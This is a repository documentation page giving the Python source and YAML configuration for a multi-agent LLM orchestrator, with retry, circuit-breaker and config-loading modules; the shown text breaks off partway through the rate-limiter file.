system-docs/02_COMPONENTES/servicios externos/orchestratorv6.md
ARCHITECT 6ea70bd34f Update to Skynet v7 - Complete documentation restructure
- New folder structure per Skynet v7
- Complete SQL schemas added
- Documentation for entities, components, and integrations
- Updated security model
- Infrastructure and operations reorganized
2025-12-29 18:23:41 +00:00


TZZR Orchestrator v6 - Complete Code

A robust, flexible multi-agent orchestration system.

Contents

  1. Project Structure
  2. main.py
  3. config.yaml
  4. orchestrator/__init__.py
  5. orchestrator/config.py
  6. orchestrator/core/__init__.py
  7. orchestrator/core/retry.py
  8. orchestrator/core/circuit_breaker.py
  9. orchestrator/core/rate_limiter.py
  10. orchestrator/providers/__init__.py
  11. orchestrator/providers/base.py
  12. orchestrator/providers/claude_provider.py
  13. orchestrator/providers/litellm_provider.py
  14. orchestrator/tools/__init__.py
  15. orchestrator/tools/definitions.py
  16. orchestrator/tools/executor.py
  17. orchestrator/agents/__init__.py
  18. orchestrator/agents/base.py
  19. orchestrator/tracking/__init__.py
  20. Configuration Examples

Project Structure

tzzr_v6/
├── main.py                  # Entry point
├── config.yaml              # Main configuration
├── .env                     # Environment variables (create from .env.example)
├── .env.example             # Example variables
├── .gitignore
├── README.md
├── orchestrator/
│   ├── __init__.py
│   ├── config.py            # Configuration management
│   ├── core/                # Resilience components
│   │   ├── __init__.py
│   │   ├── circuit_breaker.py
│   │   ├── rate_limiter.py
│   │   └── retry.py
│   ├── providers/           # LLM providers
│   │   ├── __init__.py
│   │   ├── base.py
│   │   ├── claude_provider.py
│   │   └── litellm_provider.py
│   ├── tools/               # Tools
│   │   ├── __init__.py
│   │   ├── definitions.py
│   │   └── executor.py
│   ├── agents/              # Agents
│   │   ├── __init__.py
│   │   └── base.py
│   └── tracking/            # Cost tracking
│       └── __init__.py
├── logs/                    # Per-agent logs
├── outputs/                 # Generated files
└── examples/                # Configuration examples
    ├── simple.yaml
    ├── dev_team.yaml
    ├── devops.yaml
    └── local_ollama.yaml

main.py

#!/usr/bin/env python3
"""
LLM Orchestrator - Multi-agent orchestration system.

Usage:
    python main.py                         # Interactive mode
    python main.py --status                # Show status
    python main.py --agents                # List agents
    python main.py --agent X --prompt "Y"  # Execute prompt
    python main.py --health                # Health check
"""

import asyncio
import argparse
import json
import sys
from datetime import datetime
from pathlib import Path

# Add orchestrator to path
sys.path.insert(0, str(Path(__file__).parent))

from orchestrator.config import get_config, reload_config
from orchestrator.agents import Agent, AgentResult
from orchestrator.tracking import CostTracker


class Orchestrator:
    """Main orchestrator class."""
    
    def __init__(self, config_path: str | None = None):
        print("🚀 Starting Orchestrator...")
        
        self.config = get_config(config_path)
        self.agents: dict[str, Agent] = {}
        self.cost_tracker = CostTracker()
        
        # Load agents
        for name, agent_config in self.config.agents.items():
            try:
                self.agents[name] = Agent(config_obj=agent_config)
            except Exception as e:
                print(f"⚠️  Error creating agent {name}: {e}")
        
        if self.agents:
            print(f"✅ Loaded {len(self.agents)} agent(s): {', '.join(self.agents.keys())}")
        else:
            print("⚠️  No agents loaded. Edit config.yaml")
    
    async def run_agent(self, agent_name: str, prompt: str) -> AgentResult:
        """Run a single agent."""
        if agent_name not in self.agents:
            return AgentResult(
                success=False,
                output="",
                agent_name=agent_name,
                error=f"Agent '{agent_name}' not found",
            )
        
        result = await self.agents[agent_name].run(prompt)
        
        # Track costs
        if result.usage:
            self.cost_tracker.record(
                model=self.agents[agent_name].model,
                input_tokens=result.usage.get("input_tokens", 0),
                output_tokens=result.usage.get("output_tokens", 0),
            )
        
        return result
    
    async def run_all(self, prompt: str) -> dict[str, AgentResult]:
        """Run all agents in parallel."""
        tasks = {
            name: agent.run(prompt)
            for name, agent in self.agents.items()
        }
        
        results_list = await asyncio.gather(*tasks.values(), return_exceptions=True)
        
        results = {}
        for name, result in zip(tasks.keys(), results_list):
            if isinstance(result, Exception):
                results[name] = AgentResult(
                    success=False,
                    output="",
                    agent_name=name,
                    error=str(result),
                )
            else:
                results[name] = result
        
        return results
    
    async def health_check(self) -> dict[str, bool]:
        """Check health of all agents."""
        results = {}
        for name, agent in self.agents.items():
            try:
                results[name] = await agent.health_check()
            except Exception:
                results[name] = False
        return results
    
    def get_status(self) -> dict:
        """Get orchestrator status."""
        return {
            "config_path": str(self.config.config_path) if self.config.config_path else None,
            "settings": {
                "timeout": self.config.settings.timeout,
                "rate_limit": self.config.settings.rate_limit_per_minute,
                "max_retries": self.config.settings.max_retries,
                "sandbox_paths": self.config.settings.sandbox_paths,
                "circuit_breaker": self.config.settings.enable_circuit_breaker,
            },
            "agents": {
                name: {
                    "provider": agent.provider_name,
                    "model": agent.model,
                    "tools": agent.tools,
                }
                for name, agent in self.agents.items()
            },
            "servers": list(self.config.servers.keys()),
            "costs": self.cost_tracker.summary.to_dict(),
        }
    
    async def interactive(self):
        """Run interactive mode."""
        print("\n" + "=" * 60)
        print("LLM Orchestrator - Interactive Mode")
        print("=" * 60)
        print("\nCommands:")
        print("  /status       - Show status")
        print("  /agents       - List agents")
        print("  /agent <n>    - Switch active agent")
        print("  /logs <n>     - Show agent logs")
        print("  /costs        - Show cost tracking")
        print("  /health       - Health check")
        print("  /reload       - Reload configuration")
        print("  /all          - Run on all agents (parallel)")
        print("  /quit         - Exit")
        print("-" * 60)
        
        if not self.agents:
            print("\n⚠️  No agents available. Edit config.yaml")
            return
        
        current_agent = list(self.agents.keys())[0]
        
        while True:
            try:
                prompt = input(f"\n[{current_agent}] > ").strip()
                
                if not prompt:
                    continue
                
                if prompt == "/quit":
                    print("Goodbye!")
                    break
                
                elif prompt == "/status":
                    print(json.dumps(self.get_status(), indent=2))
                
                elif prompt == "/agents":
                    for name, agent in self.agents.items():
                        marker = "→" if name == current_agent else " "
                        print(f"  {marker} {name}: {agent.provider_name}/{agent.model}")
                        if agent.tools:
                            print(f"      tools: {', '.join(agent.tools)}")
                
                elif prompt.startswith("/agent "):
                    name = prompt[7:].strip()
                    if name in self.agents:
                        current_agent = name
                        print(f"Active agent: {current_agent}")
                    else:
                        print(f"Agent '{name}' not found. Available: {', '.join(self.agents.keys())}")
                
                elif prompt.startswith("/logs "):
                    name = prompt[6:].strip()
                    if name in self.agents:
                        log = self.agents[name].read_log(last_n=5)
                        print(log if log else "(empty)")
                    else:
                        print(f"Agent '{name}' not found")
                
                elif prompt == "/costs":
                    summary = self.cost_tracker.summary
                    print(f"\n📊 Cost Summary:")
                    print(f"   Requests: {summary.total_requests}")
                    print(f"   Tokens: {summary.total_input_tokens:,} in / {summary.total_output_tokens:,} out")
                    print(f"   Cost: ${summary.total_cost_usd:.4f}")
                    if summary.by_model:
                        print("\n   By model:")
                        for model, data in summary.by_model.items():
                            print(f"     {model}: {data['requests']} req, ${data['cost_usd']:.4f}")
                
                elif prompt == "/health":
                    print("Checking health...")
                    results = await self.health_check()
                    for name, healthy in results.items():
                        status = "✅" if healthy else "❌"
                        print(f"  {status} {name}")
                
                elif prompt == "/reload":
                    self.config = reload_config()
                    self.agents = {}
                    for name, agent_config in self.config.agents.items():
                        try:
                            self.agents[name] = Agent(config_obj=agent_config)
                        except Exception as e:
                            print(f"⚠️  Error: {name}: {e}")
                    print(f"✅ Reloaded: {len(self.agents)} agent(s)")
                    if self.agents:
                        current_agent = list(self.agents.keys())[0]
                
                elif prompt == "/all":
                    user_prompt = input("Prompt: ").strip()
                    if user_prompt:
                        print("Running on all agents...")
                        results = await self.run_all(user_prompt)
                        for name, result in results.items():
                            status = "✅" if result.success else "❌"
                            output = result.output[:300] + "..." if len(result.output) > 300 else result.output
                            print(f"\n{status} {name}:\n{output or result.error}")
                
                elif prompt.startswith("/"):
                    print(f"Unknown command: {prompt}")
                
                else:
                    print("Running...")
                    result = await self.run_agent(current_agent, prompt)
                    
                    if result.success:
                        print(f"\n{result.output}")
                        if result.tool_results:
                            print(f"\n[Tools used: {len(result.tool_results)}]")
                    else:
                        print(f"\n{result.error}")
                
            except KeyboardInterrupt:
                print("\n\nUse /quit to exit.")
            except Exception as e:
                print(f"\n❌ Error: {e}")


async def main():
    parser = argparse.ArgumentParser(description="LLM Orchestrator")
    parser.add_argument("--config", type=str, help="Path to config.yaml")
    parser.add_argument("--status", action="store_true", help="Show status")
    parser.add_argument("--agents", action="store_true", help="List agents")
    parser.add_argument("--agent", type=str, help="Agent to use")
    parser.add_argument("--prompt", type=str, help="Prompt to execute")
    parser.add_argument("--health", action="store_true", help="Health check")
    
    args = parser.parse_args()
    
    orchestrator = Orchestrator(args.config)
    
    if args.status:
        print(json.dumps(orchestrator.get_status(), indent=2))
    
    elif args.agents:
        for name, agent in orchestrator.agents.items():
            print(f"  {name}: {agent.provider_name}/{agent.model}")
    
    elif args.health:
        results = await orchestrator.health_check()
        for name, healthy in results.items():
            status = "✅" if healthy else "❌"
            print(f"  {status} {name}")
    
    elif args.agent and args.prompt:
        result = await orchestrator.run_agent(args.agent, args.prompt)
        if result.success:
            print(result.output)
        else:
            print(f"Error: {result.error}", file=sys.stderr)
            sys.exit(1)
    
    else:
        await orchestrator.interactive()


if __name__ == "__main__":
    asyncio.run(main())
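The `run_all` method above relies on `asyncio.gather(..., return_exceptions=True)` so that one failing agent cannot abort the whole batch. A minimal self-contained sketch of that fan-out pattern (dummy coroutines stand in for the real `Agent` class):

```python
import asyncio

async def ok_agent(prompt: str) -> str:
    # Stand-in for a healthy agent.
    return f"handled: {prompt}"

async def broken_agent(prompt: str) -> str:
    # Stand-in for an agent whose provider is down.
    raise ConnectionError("provider unreachable")

async def run_all(agents: dict, prompt: str) -> dict:
    # Same shape as Orchestrator.run_all: gather all results,
    # then map raised exceptions to per-agent error entries.
    names = list(agents)
    results = await asyncio.gather(
        *(agents[n](prompt) for n in names), return_exceptions=True
    )
    return {
        n: (r if not isinstance(r, Exception) else f"error: {r}")
        for n, r in zip(names, results)
    }

out = asyncio.run(run_all({"a": ok_agent, "b": broken_agent}, "ping"))
```

Without `return_exceptions=True`, the first raised exception would propagate out of `gather` and discard the other agents' results.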

config.yaml

# config.yaml - LLM Orchestrator Configuration
#
# Edit this file to define your agents and servers.

# ============================================================================
# SETTINGS
# ============================================================================

settings:
  # Default provider/model if not specified per agent
  default_provider: claude
  default_model: sonnet
  
  # Timeout in seconds
  timeout: 300
  
  # Working directory (relative to this file)
  working_dir: .
  
  # Max tool iterations per turn
  max_tool_iterations: 10
  
  # Security
  sandbox_paths: true              # Restrict file access to working_dir
  ssh_strict_host_checking: true   # Verify SSH hosts
  # allowed_commands: []           # Whitelist commands (empty = all allowed)
  
  # Rate limiting
  rate_limit_per_minute: 60
  
  # Retry
  max_retries: 3
  retry_delay: 1.0
  
  # Circuit breaker (protects against cascading failures)
  enable_circuit_breaker: true
  circuit_breaker_threshold: 5     # Failures before opening
  circuit_breaker_timeout: 30.0    # Seconds before retry

# ============================================================================
# SERVERS (optional)
# ============================================================================
# Define servers for SSH access

servers:
  # Example:
  # production:
  #   host: 192.168.1.100
  #   user: deploy
  #   key: ~/.ssh/id_rsa
  #   port: 22
  #   description: "Production server"

# ============================================================================
# AGENTS
# ============================================================================
# Define your AI agents

agents:
  # Default assistant
  assistant:
    role: |
      You are a helpful assistant that can execute commands,
      read and write files, and help with various tasks.
    provider: claude
    model: sonnet
    tools:
      - bash
      - read
      - write
      - list_dir
      - glob
  
  # Coder agent (uncomment to enable)
  # coder:
  #   role: |
  #     You are an expert programmer.
  #     You write clean, well-documented, and testable code.
  #     You follow best practices and include error handling.
  #   provider: claude
  #   model: sonnet
  #   tools:
  #     - read
  #     - write
  #     - bash
  #     - grep
  #     - glob

# ============================================================================
# TASKS (optional)
# ============================================================================
# Define automated task sequences

tasks:
  # Example:
  # deploy:
  #   description: "Deploy application to production"
  #   steps:
  #     - agent: coder
  #       prompt: "Run tests"
  #     - agent: deployer
  #       prompt: "Deploy to production"
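The commented `tasks:` block describes a sequence of (agent, prompt) steps executed in order. A hypothetical driver for that shape (the code shown in this document does not include one; `run_agent` here is a stand-in, not the real `Orchestrator.run_agent`):

```python
import asyncio

async def run_agent(agent: str, prompt: str) -> str:
    # Stand-in for Orchestrator.run_agent (illustration only).
    return f"[{agent}] done: {prompt}"

async def run_task(steps: list[dict]) -> list[str]:
    outputs = []
    for step in steps:  # steps run sequentially, in declaration order
        outputs.append(await run_agent(step["agent"], step["prompt"]))
    return outputs

# The same structure as the commented `deploy` task above, as parsed from YAML.
task = [
    {"agent": "coder", "prompt": "Run tests"},
    {"agent": "deployer", "prompt": "Deploy to production"},
]
results = asyncio.run(run_task(task))
```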

orchestrator/__init__.py

"""
Orchestrator module.
"""

from .config import Config, get_config, reload_config, AgentConfig, ServerConfig, Settings
from .agents import Agent, AgentResult

__all__ = [
    "Config",
    "get_config",
    "reload_config",
    "AgentConfig",
    "ServerConfig", 
    "Settings",
    "Agent",
    "AgentResult",
]

orchestrator/config.py

"""
Configuration management.

Loads configuration from:
1. Environment variables
2. .env file
3. config.yaml

NEVER hardcode credentials.
"""

import os
from pathlib import Path
from dataclasses import dataclass, field
from typing import Optional, Dict, Any, List


def load_env():
    """Load variables from .env file if it exists."""
    env_paths = [
        Path.cwd() / ".env",
        Path(__file__).parent.parent / ".env",
    ]
    
    for env_file in env_paths:
        if env_file.exists():
            with open(env_file) as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith("#") and "=" in line:
                        key, _, value = line.partition("=")
                        key = key.strip()
                        value = value.strip().strip('"').strip("'")
                        if key and value:
                            os.environ.setdefault(key, value)
            break


# Load .env on import
load_env()


def get_env(key: str, default: str = "") -> str:
    """Get environment variable."""
    return os.environ.get(key, default)


def get_env_bool(key: str, default: bool = False) -> bool:
    """Get environment variable as boolean."""
    val = os.environ.get(key, "").lower()
    if val in ("true", "yes", "1"):
        return True
    if val in ("false", "no", "0"):
        return False
    return default


def get_env_list(key: str, default: Optional[List] = None) -> List:
    """Get environment variable as list."""
    val = os.environ.get(key, "")
    if val:
        return [x.strip() for x in val.split(",") if x.strip()]
    return default or []


@dataclass
class ServerConfig:
    """Server configuration for SSH."""
    name: str
    host: str
    user: str = "root"
    key: str = ""
    port: int = 22
    description: str = ""
    
    def __post_init__(self):
        if not self.key:
            self.key = get_env("SSH_KEY_PATH", "~/.ssh/id_rsa")


@dataclass
class AgentConfig:
    """Agent configuration."""
    name: str
    role: str
    provider: str = "claude"
    model: str = "sonnet"
    tools: List[str] = field(default_factory=list)
    servers: List[str] = field(default_factory=list)
    max_turns: int = 10


@dataclass
class Settings:
    """General settings."""
    default_provider: str = "claude"
    default_model: str = "sonnet"
    timeout: float = 300.0
    working_dir: str = "."
    max_tool_iterations: int = 10
    
    # Security
    ssh_strict_host_checking: bool = True
    sandbox_paths: bool = True
    allowed_commands: List[str] = field(default_factory=list)
    
    # Rate limiting
    rate_limit_per_minute: int = 60
    
    # Retry
    max_retries: int = 3
    retry_delay: float = 1.0
    
    # Circuit breaker
    enable_circuit_breaker: bool = True
    circuit_breaker_threshold: int = 5
    circuit_breaker_timeout: float = 30.0


class Config:
    """Main configuration manager."""
    
    def __init__(self, config_path: Optional[str] = None):
        self.config_path = self._find_config(config_path)
        self.base_dir = self.config_path.parent if self.config_path else Path.cwd()
        self._raw = self._load_yaml() if self.config_path else {}
        
        # Parse configuration
        self.settings = self._parse_settings()
        self.servers = self._parse_servers()
        self.agents = self._parse_agents()
        self.tasks = self._raw.get("tasks", {})
        
        # Directories
        self.logs_dir = self.base_dir / "logs"
        self.outputs_dir = self.base_dir / "outputs"
        
        # Create directories
        self.logs_dir.mkdir(exist_ok=True)
        self.outputs_dir.mkdir(exist_ok=True)
    
    def _find_config(self, config_path: Optional[str]) -> Optional[Path]:
        """Find configuration file."""
        if config_path:
            path = Path(config_path)
            if path.exists():
                return path
            raise FileNotFoundError(f"Config not found: {config_path}")
        
        search_paths = [
            Path.cwd() / "config.yaml",
            Path.cwd() / "config.yml",
            Path(__file__).parent.parent / "config.yaml",
        ]
        
        for path in search_paths:
            if path.exists():
                return path
        
        return None
    
    def _load_yaml(self) -> dict:
        """Load YAML file."""
        if not self.config_path:
            return {}
        
        try:
            import yaml
            with open(self.config_path) as f:
                return yaml.safe_load(f) or {}
        except ImportError:
            print("WARNING: PyYAML not installed. Run: pip install pyyaml")
            return {}
    
    def _parse_settings(self) -> Settings:
        """Parse settings section."""
        raw = self._raw.get("settings", {})
        return Settings(
            default_provider=raw.get("default_provider", "claude"),
            default_model=raw.get("default_model", "sonnet"),
            timeout=float(raw.get("timeout", 300)),
            working_dir=raw.get("working_dir", "."),
            max_tool_iterations=int(raw.get("max_tool_iterations", 10)),
            ssh_strict_host_checking=raw.get(
                "ssh_strict_host_checking",
                get_env_bool("SSH_KNOWN_HOSTS_CHECK", True)
            ),
            sandbox_paths=raw.get("sandbox_paths", True),
            allowed_commands=raw.get("allowed_commands", []),
            rate_limit_per_minute=int(raw.get("rate_limit_per_minute", 60)),
            max_retries=int(raw.get("max_retries", 3)),
            retry_delay=float(raw.get("retry_delay", 1.0)),
            enable_circuit_breaker=raw.get("enable_circuit_breaker", True),
            circuit_breaker_threshold=int(raw.get("circuit_breaker_threshold", 5)),
            circuit_breaker_timeout=float(raw.get("circuit_breaker_timeout", 30.0)),
        )
    
    def _parse_servers(self) -> Dict[str, ServerConfig]:
        """Parse servers section."""
        servers = {}
        for name, data in self._raw.get("servers", {}).items():
            if data:
                servers[name] = ServerConfig(
                    name=name,
                    host=data.get("host", ""),
                    user=data.get("user", "root"),
                    key=data.get("key", get_env("SSH_KEY_PATH", "~/.ssh/id_rsa")),
                    port=int(data.get("port", 22)),
                    description=data.get("description", ""),
                )
        return servers
    
    def _parse_agents(self) -> Dict[str, AgentConfig]:
        """Parse agents section."""
        agents = {}
        for name, data in self._raw.get("agents", {}).items():
            if data:
                agents[name] = AgentConfig(
                    name=name,
                    role=data.get("role", ""),
                    provider=data.get("provider", self.settings.default_provider),
                    model=data.get("model", self.settings.default_model),
                    tools=data.get("tools", []),
                    servers=data.get("servers", []),
                    max_turns=int(data.get("max_turns", self.settings.max_tool_iterations)),
                )
        return agents
    
    def get_agent(self, name: str) -> Optional[AgentConfig]:
        return self.agents.get(name)
    
    def get_server(self, name: str) -> Optional[ServerConfig]:
        return self.servers.get(name)
    
    def list_agents(self) -> List[str]:
        return list(self.agents.keys())
    
    def list_servers(self) -> List[str]:
        return list(self.servers.keys())


# Global instance
_config: Optional[Config] = None


def get_config(config_path: Optional[str] = None) -> Config:
    """Get global configuration."""
    global _config
    if _config is None:
        _config = Config(config_path)
    return _config


def reload_config(config_path: Optional[str] = None) -> Config:
    """Reload configuration."""
    global _config
    _config = Config(config_path)
    return _config
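Note that `load_env` never overwrites variables already present in the environment (it uses `os.environ.setdefault`), and it accepts optionally quoted values. Its per-line parsing rule can be exercised in isolation; this is a standalone re-implementation for illustration, not an import of the module above:

```python
def parse_env_line(line: str):
    """Mirror of load_env's per-line rule: skip blanks/comments,
    split on the first '=', strip surrounding quotes."""
    line = line.strip()
    if not line or line.startswith("#") or "=" not in line:
        return None
    key, _, value = line.partition("=")
    key = key.strip()
    value = value.strip().strip('"').strip("'")
    return (key, value) if key and value else None

pairs = [parse_env_line(l) for l in [
    "# comment",          # ignored
    "",                   # ignored
    'API_KEY="abc123"',   # quotes stripped
    "TIMEOUT = 300",      # whitespace around '=' tolerated
    "BROKEN",             # no '=', ignored
]]
```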

orchestrator/core/__init__.py

"""
Core components for resilience and reliability.
"""

from .retry import retry_with_backoff, RetryConfig
from .circuit_breaker import CircuitBreaker, CircuitState
from .rate_limiter import RateLimiter

__all__ = [
    "retry_with_backoff",
    "RetryConfig", 
    "CircuitBreaker",
    "CircuitState",
    "RateLimiter",
]

orchestrator/core/retry.py

"""
Retry logic with exponential backoff.

Features:
- Configurable retry attempts
- Exponential backoff with jitter
- Selective exception handling
- Async support
"""

import asyncio
import random
from dataclasses import dataclass, field
from typing import Callable, TypeVar, Optional, Type, Tuple, Any
from functools import wraps

T = TypeVar("T")


@dataclass
class RetryConfig:
    """Configuration for retry behavior."""
    
    max_retries: int = 3
    base_delay: float = 1.0
    max_delay: float = 60.0
    exponential_base: float = 2.0
    jitter: bool = True
    
    # Exceptions that should trigger retry
    retryable_exceptions: Tuple[Type[Exception], ...] = field(
        default_factory=lambda: (
            ConnectionError,
            TimeoutError,
            asyncio.TimeoutError,
        )
    )
    
    # Exceptions that should NOT retry (fail immediately)
    fatal_exceptions: Tuple[Type[Exception], ...] = field(
        default_factory=lambda: (
            KeyboardInterrupt,
            SystemExit,
            PermissionError,
        )
    )
    
    def calculate_delay(self, attempt: int) -> float:
        """Calculate delay for given attempt number."""
        delay = min(
            self.base_delay * (self.exponential_base ** attempt),
            self.max_delay
        )
        
        if self.jitter:
            # Add random jitter (±25%)
            delay = delay * (0.75 + random.random() * 0.5)
        
        return delay
    
    def should_retry(self, exception: Exception) -> bool:
        """Determine if exception should trigger retry."""
        if isinstance(exception, self.fatal_exceptions):
            return False
        
        if self.retryable_exceptions:
            return isinstance(exception, self.retryable_exceptions)
        
        # By default, retry on any non-fatal exception
        return True


async def retry_with_backoff(
    func: Callable[..., T],
    *args,
    config: Optional[RetryConfig] = None,
    on_retry: Optional[Callable[[int, Exception], None]] = None,
    **kwargs
) -> Tuple[T, int]:
    """
    Execute async function with retry and exponential backoff.
    
    Args:
        func: Async function to execute
        *args: Arguments for func
        config: Retry configuration
        on_retry: Optional callback on each retry (attempt, exception)
        **kwargs: Keyword arguments for func
        
    Returns:
        Tuple of (result, number_of_retries)
        
    Raises:
        Last exception if all retries exhausted
    """
    config = config or RetryConfig()
    last_exception: Optional[Exception] = None
    
    for attempt in range(config.max_retries + 1):
        try:
            if asyncio.iscoroutinefunction(func):
                result = await func(*args, **kwargs)
            else:
                result = func(*args, **kwargs)
            return result, attempt
            
        except Exception as e:
            last_exception = e
            
            # Check if we should retry
            if not config.should_retry(e):
                raise
            
            # Check if we have retries left
            if attempt >= config.max_retries:
                raise
            
            # Calculate delay and wait
            delay = config.calculate_delay(attempt)
            
            # Call retry callback if provided
            if on_retry:
                on_retry(attempt + 1, e)
            
            await asyncio.sleep(delay)
    
    # Should never reach here, but just in case
    if last_exception:
        raise last_exception
    raise RuntimeError("Retry logic error")


def with_retry(config: Optional[RetryConfig] = None):
    """
    Decorator for retry with backoff.
    
    Usage:
        @with_retry(RetryConfig(max_retries=5))
        async def my_function():
            ...
    """
    def decorator(func: Callable[..., T]) -> Callable[..., T]:
        @wraps(func)
        async def wrapper(*args, **kwargs) -> T:
            result, _ = await retry_with_backoff(func, *args, config=config, **kwargs)
            return result
        return wrapper
    return decorator
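With jitter disabled, `calculate_delay` produces a plain geometric series capped at `max_delay`. A standalone check of that formula (duplicating the class logic for illustration):

```python
def calculate_delay(attempt: int, base: float = 1.0,
                    exp: float = 2.0, max_delay: float = 60.0) -> float:
    # Same formula as RetryConfig.calculate_delay with jitter=False.
    return min(base * (exp ** attempt), max_delay)

# attempts 0..7 with the defaults: 1, 2, 4, 8, 16, 32, then capped at 60
delays = [calculate_delay(a) for a in range(8)]
```

With `jitter=True`, each delay is additionally scaled by a random factor in [0.75, 1.25), which spreads out retries from concurrent callers.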

orchestrator/core/circuit_breaker.py

"""
Circuit Breaker pattern implementation.

Protects against cascading failures by:
- Tracking failure rates
- Opening circuit after threshold
- Auto-recovery with half-open state
"""

import asyncio
import time
from dataclasses import dataclass
from enum import Enum
from typing import Callable, TypeVar, Optional, Any

T = TypeVar("T")


class CircuitState(Enum):
    """Circuit breaker states."""
    CLOSED = "closed"       # Normal operation
    OPEN = "open"           # Failing, reject calls
    HALF_OPEN = "half_open" # Testing recovery


@dataclass
class CircuitStats:
    """Statistics for circuit breaker."""
    total_calls: int = 0
    successful_calls: int = 0
    failed_calls: int = 0
    rejected_calls: int = 0
    last_failure_time: Optional[float] = None
    last_success_time: Optional[float] = None
    
    @property
    def failure_rate(self) -> float:
        if self.total_calls == 0:
            return 0.0
        return self.failed_calls / self.total_calls


class CircuitBreakerError(Exception):
    """Raised when circuit is open."""
    pass


class CircuitBreaker:
    """
    Circuit breaker for fault tolerance.
    
    States:
    - CLOSED: Normal operation, tracking failures
    - OPEN: Circuit tripped, rejecting calls immediately
    - HALF_OPEN: Testing if service recovered
    
    Usage:
        breaker = CircuitBreaker(failure_threshold=5)
        
        async with breaker:
            result = await risky_operation()
    """
    
    def __init__(
        self,
        failure_threshold: int = 5,
        success_threshold: int = 2,
        timeout: float = 30.0,
        half_open_max_calls: int = 3,
    ):
        """
        Args:
            failure_threshold: Failures before opening circuit
            success_threshold: Successes in half-open to close
            timeout: Seconds before trying half-open
            half_open_max_calls: Max concurrent calls in half-open
        """
        self.failure_threshold = failure_threshold
        self.success_threshold = success_threshold
        self.timeout = timeout
        self.half_open_max_calls = half_open_max_calls
        
        self._state = CircuitState.CLOSED
        self._failure_count = 0
        self._success_count = 0
        self._last_failure_time: Optional[float] = None
        self._half_open_calls = 0
        self._lock = asyncio.Lock()
        
        self.stats = CircuitStats()
    
    @property
    def state(self) -> CircuitState:
        """Current circuit state."""
        return self._state
    
    @property
    def is_closed(self) -> bool:
        return self._state == CircuitState.CLOSED
    
    @property
    def is_open(self) -> bool:
        return self._state == CircuitState.OPEN
    
    def _should_attempt_reset(self) -> bool:
        """Check if enough time passed to try half-open."""
        if self._last_failure_time is None:
            return True
        return time.time() - self._last_failure_time >= self.timeout
    
    async def _check_state(self) -> bool:
        """
        Check and potentially transition state.
        Returns True if call should proceed.
        """
        async with self._lock:
            if self._state == CircuitState.CLOSED:
                return True
            
            if self._state == CircuitState.OPEN:
                if self._should_attempt_reset():
                    self._state = CircuitState.HALF_OPEN
                    self._success_count = 0
                    self._half_open_calls = 0
                else:
                    self.stats.rejected_calls += 1
                    return False
            
            if self._state == CircuitState.HALF_OPEN:
                if self._half_open_calls >= self.half_open_max_calls:
                    self.stats.rejected_calls += 1
                    return False
                self._half_open_calls += 1
            
            return True
    
    async def _record_success(self):
        """Record successful call."""
        async with self._lock:
            self.stats.total_calls += 1
            self.stats.successful_calls += 1
            self.stats.last_success_time = time.time()
            
            if self._state == CircuitState.HALF_OPEN:
                self._success_count += 1
                if self._success_count >= self.success_threshold:
                    self._state = CircuitState.CLOSED
                    self._failure_count = 0
            
            elif self._state == CircuitState.CLOSED:
                # Reset failure count on success
                self._failure_count = 0
    
    async def _record_failure(self, exception: Exception):
        """Record failed call."""
        async with self._lock:
            self.stats.total_calls += 1
            self.stats.failed_calls += 1
            self.stats.last_failure_time = time.time()
            self._last_failure_time = time.time()
            
            if self._state == CircuitState.HALF_OPEN:
                # Any failure in half-open reopens circuit
                self._state = CircuitState.OPEN
            
            elif self._state == CircuitState.CLOSED:
                self._failure_count += 1
                if self._failure_count >= self.failure_threshold:
                    self._state = CircuitState.OPEN
    
    async def call(
        self,
        func: Callable[..., T],
        *args,
        **kwargs
    ) -> T:
        """
        Execute function through circuit breaker.
        
        Raises:
            CircuitBreakerError: If circuit is open
        """
        if not await self._check_state():
            raise CircuitBreakerError(
                f"Circuit breaker is {self._state.value}. "
                f"Retry after {self.timeout}s"
            )
        
        try:
            if asyncio.iscoroutinefunction(func):
                result = await func(*args, **kwargs)
            else:
                result = func(*args, **kwargs)
            
            await self._record_success()
            return result
            
        except Exception as e:
            await self._record_failure(e)
            raise
    
    async def __aenter__(self):
        """Async context manager entry."""
        if not await self._check_state():
            raise CircuitBreakerError(
                f"Circuit breaker is {self._state.value}"
            )
        return self
    
    async def __aexit__(self, exc_type, exc_val, exc_tb):
        """Async context manager exit."""
        if exc_type is None:
            await self._record_success()
        else:
            await self._record_failure(exc_val)
        return False  # Don't suppress exceptions
    
    def reset(self):
        """Manually reset circuit breaker."""
        self._state = CircuitState.CLOSED
        self._failure_count = 0
        self._success_count = 0
        self._last_failure_time = None
        self.stats = CircuitStats()
    
    def __repr__(self) -> str:
        return (
            f"CircuitBreaker(state={self._state.value}, "
            f"failures={self._failure_count}/{self.failure_threshold})"
        )

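The state machine above can be exercised end to end. The sketch below is a minimal, self-contained demo of the same transition rules (CLOSED → OPEN after `failure_threshold` failures, OPEN → HALF_OPEN after `timeout`, HALF_OPEN → CLOSED on success); the class and method names are illustrative stand-ins, not the orchestrator's API.

```python
import time

# Minimal standalone sketch of the transition rules implemented above.
# Illustrative only -- it does not import the orchestrator package.
class MiniBreaker:
    def __init__(self, failure_threshold=3, timeout=0.05):
        self.failure_threshold = failure_threshold
        self.timeout = timeout
        self.state = "closed"
        self.failures = 0
        self.opened_at = 0.0

    def allow(self) -> bool:
        if self.state == "open":
            if time.time() - self.opened_at >= self.timeout:
                self.state = "half_open"  # timeout elapsed: probe the service
            else:
                return False              # reject immediately while open
        return True

    def record(self, ok: bool):
        if ok:
            self.state = "closed"
            self.failures = 0
        else:
            self.failures += 1
            if self.state == "half_open" or self.failures >= self.failure_threshold:
                self.state = "open"
                self.opened_at = time.time()

b = MiniBreaker()
for _ in range(3):
    assert b.allow()
    b.record(ok=False)      # three failures trip the breaker
print(b.state)              # open
assert not b.allow()        # rejected while open
time.sleep(0.06)
assert b.allow()            # timeout elapsed -> half-open probe allowed
b.record(ok=True)
print(b.state)              # closed
```

The real `CircuitBreaker` adds what this sketch omits: an `asyncio.Lock` around every transition and a cap on concurrent probes in half-open (`half_open_max_calls`).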
### orchestrator/core/rate_limiter.py

"""
Rate limiter with sliding window.

Features:
- Sliding window algorithm
- Async-safe with lock
- Configurable burst allowance
"""

import asyncio
import time
from collections import deque
from dataclasses import dataclass
from typing import Optional


@dataclass
class RateLimitStats:
    """Statistics for rate limiter."""
    total_requests: int = 0
    allowed_requests: int = 0
    throttled_requests: int = 0
    total_wait_time: float = 0.0


class RateLimiter:
    """
    Sliding window rate limiter.
    
    Limits calls to max_calls per period seconds.
    
    Usage:
